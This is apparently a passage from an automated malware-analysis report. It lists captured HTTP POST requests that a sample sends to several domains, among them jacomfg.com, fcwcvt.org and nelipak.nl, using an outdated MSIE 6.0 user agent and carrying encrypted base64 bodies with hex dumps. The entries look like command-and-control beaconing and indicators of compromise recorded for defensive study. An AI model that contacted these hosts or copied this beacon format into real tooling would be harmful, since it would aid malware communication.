41 35 4c 30 5a 79 2f 77 69 46 55 50 30 71 4b 4f 64 69 61 62 4e 4d 63 74 51 4e 2f 66 33 35 48 43 37 43 77 4e 61 4b 5a 74 43 52 42 42 53 2b 70 6a 76 34 35 57 67 70 62 68 45 6c 74 4b 49 31 2f 68 4a 78 55 55 42 64 5a 72 6f 2f 69 57 70 41 61 31 49 7a 55 44 52 4e 4d 31 62 71 65 4b 4a 41 66 66 41 36 2b 44 2b 32 57 4f 4a 61 4f 59 74 2f 66 47 6d 6f 53 2f 64 50 43 52 37 54 6b 52 79 2b 35 64 2f 6b 51 51 36 59 42 50 36 30 75 44 66 63 59 6a 4b 4a 32 67 4c 42 30 4e 4a 55 35 71 38 69 63 72 50 44 4e 6c 72 33 75 72 65 78 6e 41 6a 6a 43 4e 6e 45 36 47 6c 4e 50 4a 34 72 37 71 70 6d 6f 62 6e 52 76 33 2b 63 6a 37 4f 39 62 70 77 48 39 38 4d 47 4a 36 35 68 56 78 45 6b 34 36 73 36 72 56 77 6d 79 4d 64 70 61 66 30 52 64 4a 73 4f 31 33 37 2b 51 79 53 6c 64 71 79 64 77 59 47 59 64 65 38 6c 75 4e 6d 72 6b 70 6b 71 6d 39 54 61 35 77 77 63 34 49 52 31 72 69 30 66 77 7a 6a 42 4c 65 37 6f 64 48 61 75 55 6d 64 43 43 4a 77 67 47 32 74 65 44 62 39 30 35 65 46 62 41 7a 35 56 6c 79 6a 41 74 6c 4a 38 78 53 52 34 57 57 62 50 67 4d 79 2f 6b 39 6f 43 6f 4e 65 2f 71 36 6f 6b 4f 46 79 45 6e 59 5a 4b 54 6f 43 32 46 30 75 2f 4c 43 56 41 48 6e 65 44 2f 72 6a 6b 37 43 65 42 39 72 6e 66 33 63 Data Ascii: hDRz5xeUcsaaJZN1BqKAbWAyNOxNZtW/O1FeQ7SkMlpwdycqfTDB23Lr1HUMpEElbIuq8FaghFjP6xZhWWSmhe4ecskhO1F9FUpJaM0TvAD08v9A/TTfZd3VXSra8i+5pqAMnHhfGJiTpI/UCZ7+/7TA5knD9sn1rzO2A5L0Zy/wiFUP0qKOdiabNMctQN/f35HC7CwNaKZtCRBBS+pjv45WgpbhEltKI1/hJxUUBdZro/iWpAa1IzUDRNM1bqeKJAffA6+D+2WOJaOYt/fGmoS/dPCR7TkRy+5d/kQQ6YBP60uDfcYjKJ2gLB0NJU5q8icrPDNlr3urexnAjjCNnE6GlNPJ4r7qpmobnRv3+cj7O9bpwH98MGJ65hVxEk46s6rVwmyMdpaf0RdJsO137+QySldqydwYGYde8luNmrkpkqm9Ta5wwc4IR1ri0fwzjBLe7odHauUmdCCJwgG2teDb905eFbAz5VlyjAtlJ8xSR4WWbPgMy/k9oCoNe/q6okOFyEnYZKToC2F0u/LCVAHneD/rjk7CeB9rnf3c
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 61 77 6a 59 71 53 72 6b 65 4d 62 6b 61 73 6c 4a 44 55 57 56 77 2b 33 69 54 57 35 61 44 77 33 56 2f 74 41 75 66 51 71 65 4e 35 70 6a 4a 36 4a 34 36 5a 47 39 30 32 4a 45 4e 33 74 71 38 69 2f 37 63 62 4d 45 4a 35 34 34 51 50 59 41 54 7a 58 57 74 6a 4b 47 39 79 48 55 5a 6b 46 4f 63 70 2b 39 36 59 5a 36 57 49 6f 66 36 75 59 6d 31 33 46 75 43 4d 44 61 58 62 49 62 2f 64 6d 4a 69 33 76 34 51 4f 68 47 45 56 48 56 34 44 75 31 2f 43 6f 7a 4f 4a 6a 38 62 32 56 63 2b 78 54 68 6f 46 72 2f 4a 32 66 66 36 79 33 5a 4a 2b 35 76 66 2b 32 79 4b 58 6a 42 4a 71 6b 53 6d 6c 64 6f 36 56 4d 67 62 47 6e 6f 61 4c 30 49 46 6b 63 71 4e 44 77 49 76 76 6b 57 5a 37 4c 35 71 38 49 4c 39 52 50 33 32 48 62 76 74 39 56 57 5a 4f 61 48 4e 56 79 41 4c 36 63 36 39 33 72 75 49 42 79 48 61 4d 59 76 4e 55 76 4c 56 6c 72 6c 56 49 79 37 38 36 59 6d 74 4b 47 4a 49 53 2f 4b 2b 46 75 50 6b 48 68 66 50 6b 2b 43 71 7a 41 75 75 31 76 6b 43 50 32 78 66 57 48 72 36 4a 6a 69 64 33 62 34 6a 73 4e 51 67 41 66 4b 39 75 6a 7a 34 66 75 38 48 6f 6c 2f 49 47 44 51 37 32 42 44 37 51 37 39 39 30 36 2b 5a 47 4e 71 36 73 42 47 2f 69 32 45 46 47 39 34 58 64 42 66 79 4e 4b 74 30 69 64 65 75 35 31 54 71 71 7a 45 67 57 57 79 6f 57 63 4c 6b 49 63 64 4c 50 44 33 44 6f 52 67 79 72 79 6c 7a 65 31 49 78 49 72 6d 6f 37 6b 39 43 44 57 36 4d 4b 73 68 56 57 38 71 4a 45 73 6f 6e 58 51 4f 71 43 47 31 6c 58 68 35 68 44 68 77 53 72 53 6f 4f 66 59 65 54 65 6a 6a 4e 50 44 37 66 78 70 51 37 47 75 4a 48 75 4d 35 4d 6d 44 4f 69 48 68 79 6a 59 70 78 49 67 45 78 33 70 6e 61 79 48 6c 4c 69 33 4c 52 58 61 32 73 6e 4c 54 39 48 53 53 39 45 4f 63 2b 49 78 69 71 2f 71 51 4d 58 73 78 66 31 2f 44 43 58 69 4b 63 31 33 38 7a 64 4f 4c 49 30 4b 57 41 41 6c 59 74 7a 34 42 47 5a 74 62 66 2b 4f 45 4e 69 78 79 45 75 78 79 61 4c 30 2f 52 2b 51 3d 3d Data Ascii: awjYqSrkeMbkaslJDUWVw+3iTW5aDw3V/tAufQqeN5pjJ6J46ZG902JEN3tq8i/7cbMEJ544QPYATzXWtjKG9yHUZkFOcp+96YZ6WIof6uYm13FuCMDaXbIb/dmJi3v4QOhGEVHV4Du1/CozOJj8b2Vc+xThoFr/J2ff6y3ZJ+5vf+2yKXjBJqkSmldo6VMgbGnoaL0IFkcqNDwIvvkWZ7L5q8IL9RP32Hbvt9VWZOaHNVyAL6c693ruIByHaMYvNUvLVlrlVIy786YmtKGJIS/K+FuPkHhfPk+CqzAuu1vkCP2xfWHr6Jjid3b4jsNQgAfK9ujz4fu8Hol/IGDQ72BD7Q79906+ZGNq6sBG/i2EFG94XdBfyNKt0ideu51TqqzEgWWyoWcLkIcdLPD3DoRgyrylze1IxIrmo7k9CDW6MKshVW8qJEsonXQOqCG1lXh5hDhwSrSoOfYeTejjNPD7fxpQ7GuJHuM5MmDOiHhyjYpxIgEx3pnayHlLi3LRXa2snLT9HSS9EOc+Ixiq/qQMXsxf1/DCXiKc138zdOLI0KWAAlYtz4BGZtbf+OENixyEuxyaL0/R+Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 75 66 30 7a 6f 5a 44 73 67 4d 5a 4a 6d 68 52 66 49 31 5a 4d 79 55 4d 57 38 46 61 34 4c 69 52 4a 78 4f 53 46 54 32 56 35 32 79 63 55 73 58 4e 47 50 4d 73 4d 45 35 68 49 66 57 4a 65 4d 6e 6b 47 48 77 51 53 6b 4c 73 53 73 4b 65 55 2b 6c 4c 65 48 71 43 71 39 68 46 51 61 2b 67 49 4e 63 38 55 78 52 65 63 67 52 72 4d 30 5a 6f 2f 31 6b 5a 7a 43 51 6b 6f 62 44 4d 56 45 68 44 4b 73 5a 56 64 6c 45 6b 32 41 32 4c 61 5a 49 36 67 68 53 50 51 76 56 41 73 43 56 4c 62 5a 76 76 6a 44 32 2f 34 32 2b 4c 34 2b 37 4c 53 4d 76 46 4a 49 41 6c 4a 65 76 6c 65 43 77 75 53 67 48 48 66 6a 6e 5a 2b 49 72 33 2f 77 4c 35 6f 6c 4c 33 4c 42 78 39 49 58 42 6f 51 6e 32 46 70 30 31 5a 47 7a 44 4c 35 6d 47 65 52 63 4c 36 6a 69 4f 48 6a 76 74 6e 33 48 4a 6e 6c 56 6f 6c 75 35 6f 4a 4b 76 33 78 43 49 51 66 48 44 33 6b 46 47 62 53 75 62 4c 49 35 42 48 6e 6f 43 75 57 4a 56 61 63 5a 42 67 39 62 6b 64 57 50 4c 6c 36 52 39 46 33 46 56 73 45 52 4f 4f 38 49 79 37 4d 64 75 5a 59 75 39 4d 78 74 79 65 68 51 54 4d 67 75 6b 70 7a 35 6a 77 4a 6d 38 63 53 37 64 5a 57 74 39 36 64 51 4a 71 4a 78 37 53 4c 75 4a 31 6d 52 67 62 33 41 77 4c 57 6a 56 2f 67 5a 71 76 39 61 4c 4f 7a 4a 73 71 75 57 52 55 6e 4d 35 50 2f 4c 58 2b 4e 38 41 30 6f 74 49 50 4e 6d 43 37 4b 73 34 43 39 59 61 53 30 6b 64 42 6c 37 6a 62 41 53 48 4b 6b 61 53 6d 45 2f 31 68 57 54 49 59 53 6b 4c 4e 4b 34 47 56 73 73 50 4b 36 59 44 43 77 38 4b 4a 38 78 4b 6c 5a 57 5a 77 56 4d 2f 59 68 4d 6a 6d 49 59 77 76 43 36 7a 4c 44 43 64 4c 72 78 49 75 70 5a 55 46 54 58 72 55 4a 6a 54 48 4f 35 71 30 39 53 58 44 56 30 61 46 48 6a 48 32 62 79 45 50 72 61 41 2f 38 50 68 6c 32 54 59 74 70 67 5a 59 4d 6e 74 76 73 3d Data Ascii: uf0zoZDsgMZJmhRfI1ZMyUMW8Fa4LiRJxOSFT2V52ycUsXNGPMsME5hIfWJeMnkGHwQSkLsSsKeU+lLeHqCq9hFQa+gINc8UxRecgRrM0Zo/1kZzCQkobDMVEhDKsZVdlEk2A2LaZI6ghSPQvVAsCVLbZvvjD2/42+L4+7LSMvFJIAlJevleCwuSgHHfjnZ+Ir3/wL5olL3LBx9IXBoQn2Fp01ZGzDL5mGeRcL6jiOHjvtn3HJnlVolu5oJKv3xCIQfHD3kFGbSubLI5BHnoCuWJVacZBg9bkdWPLl6R9F3FVsEROO8Iy7MduZYu9MxtyehQTMgukpz5jwJm8cS7dZWt96dQJqJx7SLuJ1mRgb3AwLWjV/gZqv9aLOzJsquWRUnM5P/LX+N8A0otIPNmC7Ks4C9YaS0kdBl7jbASHKkaSmE/1hWTIYSkLNK4GVssPK6YDCw8KJ8xKlZWZwVM/YhMjmIYwvC6zLDCdLrxIupZUFTXrUJjTHO5q09SXDV0aFHjH2byEPraA/8Phl2TYtpgZYMntvs=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 68 44 52 7a 35 78 65 55 63 73 61 61 4a 5a 4e 31 42 71 4b 41 62 57 41 79 4e 4f 78 4e 5a 74 57 2f 4f 31 46 65 51 37 53 6b 4d 6c 70 77 64 79 63 71 66 54 44 42 32 33 4c 72 31 48 55 4d 70 45 45 6c 62 49 75 71 38 46 61 67 68 46 6a 50 36 78 5a 68 57 57 53 6d 68 65 34 65 63 73 6b 68 4f 31 46 39 46 55 70 4a 61 4d 30 54 76 41 44 30 38 76 39 41 2f 54 54 66 5a 64 33 56 58 53 72 61 38 69 2b 35 70 71 41 4d 6e 48 68 66 47 4a 69 54 70 49 2f 55 43 5a 37 2b 2f 37 54 41 35 6b 6e 44 39 73 6e 31 72 7a 4f 32 41 35 4c 30 5a 79 2f 77 69 46 55 50 30 71 4b 4f 64 69 61 62 4e 4d 63 74 51 4e 2f 66 33 35 48 43 37 43 77 4e 61 4b 5a 74 43 52 42 42 53 2b 70 6a 76 34 35 57 67 70 62 68 45 6c 74 4b 49 31 2f 68 4a 78 55 55 42 64 5a 72 6f 2f 69 57 70 41 61 31 49 7a 55 44 52 4e 4d 31 62 71 65 4b 4a 41 66 66 41 36 2b 44 2b 32 57 4f 4a 61 4f 59 74 2f 66 47 6d 6f 53 2f 64 50 43 52 37 54 6b 52 79 2b 35 64 2f 6b 51 51 36 59 42 50 36 30 75 44 66 63 59 6a 4b 4a 32 67 4c 42 30 4e 4a 55 35 71 38 69 63 72 50 44 4e 6c 72 33 75 72 65 78 6e 41 6a 6a 43 4e 6e 45 36 47 6c 4e 50 4a 34 72 37 71 70 6d 6f 62 6e 52 76 33 2b 63 6a 37 4f 39 62 70 77 48 39 38 4d 47 4a 36 35 68 56 78 45 6b 34 36 73 36 72 56 77 6d 79 4d 64 70 61 66 30 52 64 4a 73 4f 31 33 37 2b 51 79 53 6c 64 71 79 64 77 59 47 59 64 65 38 6c 75 4e 6d 72 6b 70 6b 71 6d 39 54 61 35 77 77 63 34 49 52 31 72 69 30 66 77 7a 6a 42 4c 65 37 6f 64 48 61 75 55 6d 64 43 43 4a 77 67 47 32 74 65 44 62 39 30 35 65 46 62 41 7a 35 56 6c 79 6a 41 74 6c 4a 38 78 53 52 34 57 57 62 50 67 4d 79 2f 6b 39 6f 43 6f 4e 65 2f 71 36 6f 6b 4f 46 79 45 6e 59 5a 4b 54 6f 43 32 46 30 75 2f 4c 43 56 41 48 6e 65 44 2f 72 6a 6b 37 43 65 42 39 72 6e 66 33 63 Data Ascii: hDRz5xeUcsaaJZN1BqKAbWAyNOxNZtW/O1FeQ7SkMlpwdycqfTDB23Lr1HUMpEElbIuq8FaghFjP6xZhWWSmhe4ecskhO1F9FUpJaM0TvAD08v9A/TTfZd3VXSra8i+5pqAMnHhfGJiTpI/UCZ7+/7TA5knD9sn1rzO2A5L0Zy/wiFUP0qKOdiabNMctQN/f35HC7CwNaKZtCRBBS+pjv45WgpbhEltKI1/hJxUUBdZro/iWpAa1IzUDRNM1bqeKJAffA6+D+2WOJaOYt/fGmoS/dPCR7TkRy+5d/kQQ6YBP60uDfcYjKJ2gLB0NJU5q8icrPDNlr3urexnAjjCNnE6GlNPJ4r7qpmobnRv3+cj7O9bpwH98MGJ65hVxEk46s6rVwmyMdpaf0RdJsO137+QySldqydwYGYde8luNmrkpkqm9Ta5wwc4IR1ri0fwzjBLe7odHauUmdCCJwgG2teDb905eFbAz5VlyjAtlJ8xSR4WWbPgMy/k9oCoNe/q6okOFyEnYZKToC2F0u/LCVAHneD/rjk7CeB9rnf3c
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 48 39 58 6d 35 6f 75 50 63 73 5a 76 6a 38 51 51 34 70 38 45 2b 76 54 64 37 6c 66 52 6d 4c 69 2f 37 36 6b 57 4c 56 67 78 6e 5a 6d 43 75 4e 55 71 68 56 64 2f 41 6a 56 6e 34 49 6c 4c 30 63 38 53 46 42 41 30 53 68 75 41 61 50 78 2f 51 64 4a 75 39 71 6a 32 62 69 38 39 39 48 35 39 4e 75 33 4a 64 54 57 53 56 42 66 72 5a 30 79 54 79 79 49 39 44 4f 6b 4f 4a 77 67 4c 7a 68 4d 36 70 4a 6a 62 69 72 75 48 70 44 49 63 52 52 62 51 59 37 73 56 4c 38 75 51 71 73 63 35 43 4c 63 71 45 72 2f 7a 44 53 76 79 78 42 74 68 45 56 42 54 79 65 61 41 49 61 42 41 38 61 69 73 6e 54 77 53 4e 2f 37 50 76 33 37 2f 4b 65 42 69 50 2f 4a 4a 46 56 68 31 5a 6e 50 70 76 65 4c 61 5a 6e 6c 44 73 69 4d 39 77 6d 71 68 54 51 36 6b 55 55 35 7a 77 6f 5a 64 63 4e 4b 65 35 57 47 57 46 31 74 64 35 52 6a 4f 41 71 64 57 39 6c 4f 35 37 6e 6b 74 4d 76 50 42 39 6e 37 6a 62 4a 4c 62 74 75 73 50 52 53 49 6a 33 31 65 32 75 45 30 6f 37 53 44 51 53 32 4a 50 71 35 63 79 74 53 38 31 36 42 51 50 48 4f 5a 39 62 65 78 33 77 4f 50 44 55 64 55 70 6b 31 37 30 49 30 44 5a 64 72 72 4a 66 55 68 5a 4b 45 6c 64 71 72 53 4d 74 54 4a 4e 72 79 61 67 6d 37 32 50 62 53 66 39 50 47 69 35 76 6b 42 32 44 6e 69 54 61 66 6e 6c 62 39 32 50 64 6b 46 65 49 53 48 37 6c 4d 59 71 4c 7a 49 55 72 35 36 48 4b 73 37 71 6d 39 74 31 31 43 54 54 73 4a 56 76 71 43 6b 49 69 2b 72 58 79 35 6d 6d 4e 43 69 46 53 35 49 30 64 55 35 73 68 63 79 77 48 39 73 33 68 2f 6f 42 34 57 6a 46 31 71 4c 30 37 76 7a 6a 65 73 72 55 79 4b 41 78 69 66 79 50 66 36 42 57 55 2f 66 33 6b 6c 57 44 42 4f 6c 34 4a 55 54 52 68 34 34 4a 49 35 49 76 50 76 63 47 70 58 58 34 4f 4f 71 36 41 77 49 4a 6b 53 66 47 38 64 46 2b 76 4c 30 50 5a 67 37 69 67 63 58 51 72 36 67 44 4b 62 74 74 58 6d 64 64 61 64 78 6f 6e 56 2f 75 56 67 3d 3d Data Ascii: H9Xm5ouPcsZvj8QQ4p8E+vTd7lfRmLi/76kWLVgxnZmCuNUqhVd/AjVn4IlL0c8SFBA0ShuAaPx/QdJu9qj2bi899H59Nu3JdTWSVBfrZ0yTyyI9DOkOJwgLzhM6pJjbiruHpDIcRRbQY7sVL8uQqsc5CLcqEr/zDSvyxBthEVBTyeaAIaBA8aisnTwSN/7Pv37/KeBiP/JJFVh1ZnPpveLaZnlDsiM9wmqhTQ6kUU5zwoZdcNKe5WGWF1td5RjOAqdW9lO57nktMvPB9n7jbJLbtusPRSIj31e2uE0o7SDQS2JPq5cytS816BQPHOZ9bex3wOPDUdUpk170I0DZdrrJfUhZKEldqrSMtTJNryagm72PbSf9PGi5vkB2DniTafnlb92PdkFeISH7lMYqLzIUr56HKs7qm9t11CTTsJVvqCkIi+rXy5mmNCiFS5I0dU5shcywH9s3h/oB4WjF1qL07vzjesrUyKAxifyPf6BWU/f3klWDBOl4JUTRh44JI5IvPvcGpXX4OOq6AwIJkSfG8dF+vL0PZg7igcXQr6gDKbttXmddadxonV/uVg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 75 66 30 7a 6f 5a 44 73 67 4d 5a 4a 6d 68 52 66 49 31 5a 4d 79 55 4d 57 38 46 61 34 4c 69 52 4a 78 4f 53 46 54 32 56 35 32 79 63 55 73 58 4e 47 50 4d 73 4d 45 35 68 49 66 57 4a 65 4d 6e 6b 47 48 77 51 53 6b 4c 73 53 73 4b 65 55 2b 6c 4c 65 48 71 43 71 39 68 46 51 61 2b 67 49 4e 63 38 55 78 52 65 63 67 52 72 4d 30 5a 6f 2f 31 6b 5a 7a 43 51 6b 6f 62 44 4d 56 45 68 44 4b 73 5a 56 64 6c 45 6b 32 41 32 4c 61 5a 49 36 67 68 53 50 51 76 56 41 73 43 56 4c 62 5a 76 76 6a 44 32 2f 34 32 2b 4c 34 2b 37 4c 53 4d 76 46 4a 49 41 6c 4a 65 76 6c 65 43 77 75 53 67 48 48 66 6a 6e 5a 2b 49 72 33 2f 77 4c 35 6f 6c 4c 33 4c 42 78 39 49 58 42 6f 51 6e 32 46 70 30 31 5a 47 7a 44 4c 35 6d 47 65 52 63 4c 36 6a 69 4f 48 6a 76 74 6e 33 48 4a 6e 6c 56 6f 6c 75 35 6f 4a 4b 76 33 78 43 49 51 66 48 44 33 6b 46 47 62 53 75 62 4c 49 35 42 48 6e 6f 43 75 57 4a 56 61 63 5a 42 67 39 62 6b 64 57 50 4c 6c 36 52 39 46 33 46 56 73 45 52 4f 4f 38 49 79 37 4d 64 75 5a 59 75 39 4d 78 74 79 65 68 51 54 4d 67 75 6b 70 7a 35 6a 77 4a 6d 38 63 53 37 64 5a 57 74 39 36 64 51 4a 71 4a 78 37 53 4c 75 4a 31 6d 52 67 62 33 41 77 4c 57 6a 56 2f 67 5a 71 76 39 61 4c 4f 7a 4a 73 71 75 57 52 55 6e 4d 35 50 2f 4c 58 2b 4e 38 41 30 6f 74 49 50 4e 6d 43 37 4b 73 34 43 39 59 61 53 30 6b 64 42 6c 37 6a 62 41 53 48 4b 6b 61 53 6d 45 2f 31 68 57 54 49 59 53 6b 4c 4e 4b 34 47 56 73 73 50 4b 36 59 44 43 77 38 4b 4a 38 78 4b 6c 5a 57 5a 77 56 4d 2f 59 68 4d 6a 6d 49 59 77 76 43 36 7a 4c 44 43 64 4c 72 78 49 75 70 5a 55 46 54 58 72 55 4a 6a 54 48 4f 35 71 30 39 53 58 44 56 30 61 46 48 6a 48 32 62 79 45 50 72 61 41 2f 38 50 68 6c 32 54 59 74 70 67 5a 59 4d 6e 74 76 73 3d Data Ascii: uf0zoZDsgMZJmhRfI1ZMyUMW8Fa4LiRJxOSFT2V52ycUsXNGPMsME5hIfWJeMnkGHwQSkLsSsKeU+lLeHqCq9hFQa+gINc8UxRecgRrM0Zo/1kZzCQkobDMVEhDKsZVdlEk2A2LaZI6ghSPQvVAsCVLbZvvjD2/42+L4+7LSMvFJIAlJevleCwuSgHHfjnZ+Ir3/wL5olL3LBx9IXBoQn2Fp01ZGzDL5mGeRcL6jiOHjvtn3HJnlVolu5oJKv3xCIQfHD3kFGbSubLI5BHnoCuWJVacZBg9bkdWPLl6R9F3FVsEROO8Iy7MduZYu9MxtyehQTMgukpz5jwJm8cS7dZWt96dQJqJx7SLuJ1mRgb3AwLWjV/gZqv9aLOzJsquWRUnM5P/LX+N8A0otIPNmC7Ks4C9YaS0kdBl7jbASHKkaSmE/1hWTIYSkLNK4GVssPK6YDCw8KJ8xKlZWZwVM/YhMjmIYwvC6zLDCdLrxIupZUFTXrUJjTHO5q09SXDV0aFHjH2byEPraA/8Phl2TYtpgZYMntvs=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 6b 4b 45 78 77 48 4d 2b 69 73 62 31 59 67 45 64 75 76 47 51 66 78 79 31 4c 41 58 5a 70 58 34 79 56 39 50 37 62 47 46 76 51 37 72 43 4b 6d 74 37 62 4d 31 36 6b 6c 41 75 46 54 39 4d 73 76 59 79 4d 76 51 54 6e 63 47 72 65 61 42 43 76 78 2b 61 48 65 53 68 47 65 32 51 47 6d 59 42 78 50 77 73 51 42 34 63 67 33 52 6b 6d 6e 52 6f 4c 45 34 46 78 41 4e 58 77 35 70 51 41 38 4c 75 6c 57 59 46 33 56 39 4d 2b 69 79 46 39 61 74 33 49 57 54 41 6e 36 6a 66 75 75 76 4d 76 2f 31 6c 33 41 41 79 49 54 64 74 67 6f 51 44 63 70 44 36 61 45 43 67 30 32 6f 70 37 51 33 59 67 2b 73 4b 4c 4c 4a 59 65 54 31 4a 38 58 36 4c 4f 46 67 2f 42 4e 61 49 65 33 64 53 4e 31 54 6b 55 73 6c 7a 37 48 32 6f 41 36 71 43 2f 4c 62 49 78 4e 4c 6b 53 50 4c 57 36 75 59 4d 46 68 74 6d 49 53 72 75 66 30 5a 51 39 6b 43 2f 79 74 70 55 75 34 55 6b 39 49 4f 58 52 35 70 61 68 48 46 71 54 6f 45 79 41 50 77 4b 33 58 4a 79 4b 44 38 4e 4d 47 47 44 30 6b 72 42 49 46 48 72 78 31 55 7a 79 61 31 67 41 4a 31 61 79 67 2b 57 47 79 47 51 63 34 4a 79 47 44 51 4e 69 34 72 6c 79 37 67 6b 61 6d 64 7a 53 48 47 64 41 78 6a 75 6e 44 53 43 37 34 37 78 2f 76 54 56 6d 6b 4d 4c 4a 4e 69 76 71 45 74 78 45 79 49 50 47 75 63 77 72 2b 35 55 66 38 70 56 59 6c 67 70 46 71 63 61 52 32 61 6b 4c 57 78 78 46 49 6f 53 70 69 68 2f 36 41 72 73 72 42 73 4d 4f 41 36 59 62 50 62 54 6c 78 44 72 4d 72 6b 6b 62 2b 48 30 47 45 6a 47 76 4a 33 35 52 4e 38 31 56 38 71 56 44 50 4d 77 62 45 52 4e 34 67 53 73 49 57 33 61 31 4d 63 72 48 75 5a 4c 68 75 73 41 6b 6f 6f 2f 67 66 64 6d 79 43 6d 71 6c 37 31 44 77 52 76 43 69 46 68 6a 33 67 45 72 39 37 4a 75 6c 47 31 72 56 56 32 58 70 62 36 65 54 4c 6b 37 56 52 79 45 58 67 3d 3d Data Ascii: kKExwHM+isb1YgEduvGQfxy1LAXZpX4yV9P7bGFvQ7rCKmt7bM16klAuFT9MsvYyMvQTncGreaBCvx+aHeShGe2QGmYBxPwsQB4cg3RkmnRoLE4FxANXw5pQA8LulWYF3V9M+iyF9at3IWTAn6jfuuvMv/1l3AAyITdtgoQDcpD6aECg02op7Q3Yg+sKLLJYeT1J8X6LOFg/BNaIe3dSN1TkUslz7H2oA6qC/LbIxNLkSPLW6uYMFhtmISruf0ZQ9kC/ytpUu4Uk9IOXR5pahHFqToEyAPwK3XJyKD8NMGGD0krBIFHrx1Uzya1gAJ1ayg+WGyGQc4JyGDQNi4rly7gkamdzSHGdAxjunDSC747x/vTVmkMLJNivqEtxEyIPGucwr+5Uf8pVYlgpFqcaR2akLWxxFIoSpih/6ArsrBsMOA6YbPbTlxDrMrkkb+H0GEjGvJ35RN81V8qVDPMwbERN4gSsIW3a1McrHuZLhusAkoo/gfdmyCmql71DwRvCiFhj3gEr97JulG1rVV2Xpb6eTLk7VRyEXg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 4e 42 4c 52 67 64 38 33 69 4d 62 35 2b 49 37 61 50 71 4e 6a 44 47 67 74 47 59 32 31 57 64 73 51 67 35 58 79 52 35 4f 61 59 39 2b 59 6c 73 41 5a 71 6c 4f 51 65 4f 4b 47 48 47 51 48 47 54 34 46 79 32 71 47 4a 76 2f 7a 2f 7a 46 4a 74 48 47 44 4c 75 6c 76 7a 44 6b 43 55 48 69 36 63 38 79 79 53 67 59 35 34 56 6e 6f 39 71 41 33 41 70 69 4b 7a 6a 4b 68 5a 63 5a 63 30 42 44 55 68 78 50 6c 4a 62 4d 34 2f 38 33 4c 51 65 75 33 75 69 48 50 4e 6c 79 2b 6e 70 54 65 55 61 51 7a 56 49 6d 52 33 62 58 5a 78 66 31 42 6e 32 6a 6a 72 58 38 47 77 38 4f 68 6b 73 79 6f 44 51 38 51 72 43 2f 50 61 58 46 53 4b 4a 4f 4f 56 66 74 58 53 6d 43 76 59 46 74 37 2b 5a 41 50 47 5a 4c 72 44 58 42 4f 76 71 74 37 72 38 43 59 55 61 42 63 58 76 39 50 41 7a 66 70 47 2f 6f 33 68 7a 45 6a 43 49 6a 6d 51 75 31 72 31 46 38 73 4a 38 30 44 50 38 64 72 41 71 34 6d 49 4d 4a 47 61 30 57 52 4b 65 45 49 77 2b 32 33 46 41 34 79 70 70 47 37 4e 50 37 49 72 32 62 63 65 39 43 30 51 61 53 42 53 4c 71 68 44 59 41 53 37 51 77 41 75 57 6f 4e 41 37 7a 70 72 4a 33 39 77 64 38 42 34 45 64 2b 71 55 37 61 35 45 4a 4e 65 6a 49 2b 7a 6b 2f 4f 79 35 71 56 6d 39 62 48 4a 51 2b 31 51 6e 75 35 36 6a 50 6f 46 78 75 57 30 56 45 72 6f 49 35 4f 36 46 49 43 54 57 50 71 4f 37 2b 2f 38 4f 57 38 4e 69 67 51 69 46 52 34 31 61 6d 77 54 6c 57 73 70 61 41 59 47 35 51 66 52 4b 61 30 51 7a 79 66 2f 39 66 71 36 66 76 30 77 69 48 6d 6b 39 6c 36 46 66 6f 4f 42 44 50 55 68 2f 61 67 6d 73 42 65 64 57 57 4f 66 6d 43 67 2f 6a 64 78 59 5a 4e 34 55 65 67 36 4c 62 58 58 6c 41 67 58 63 74 4c 63 72 4e 37 55 57 6d 51 4e 76 68 45 34 4f 78 64 6e 71 75 4d 54 46 66 68 4a 56 36 70 64 58 54 38 30 42 42 63 3d Data Ascii: NBLRgd83iMb5+I7aPqNjDGgtGY21WdsQg5XyR5OaY9+YlsAZqlOQeOKGHGQHGT4Fy2qGJv/z/zFJtHGDLulvzDkCUHi6c8yySgY54Vno9qA3ApiKzjKhZcZc0BDUhxPlJbM4/83LQeu3uiHPNly+npTeUaQzVImR3bXZxf1Bn2jjrX8Gw8OhksyoDQ8QrC/PaXFSKJOOVftXSmCvYFt7+ZAPGZLrDXBOvqt7r8CYUaBcXv9PAzfpG/o3hzEjCIjmQu1r1F8sJ80DP8drAq4mIMJGa0WRKeEIw+23FA4yppG7NP7Ir2bce9C0QaSBSLqhDYAS7QwAuWoNA7zprJ39wd8B4Ed+qU7a5EJNejI+zk/Oy5qVm9bHJQ+1Qnu56jPoFxuW0VEroI5O6FICTWPqO7+/8OW8NigQiFR41amwTlWspaAYG5QfRKa0Qzyf/9fq6fv0wiHmk9l6FfoOBDPUh/agmsBedWWOfmCg/jdxYZN4Ueg6LbXXlAgXctLcrN7UWmQNvhE4OxdnquMTFfhJV6pdXT80BBc=
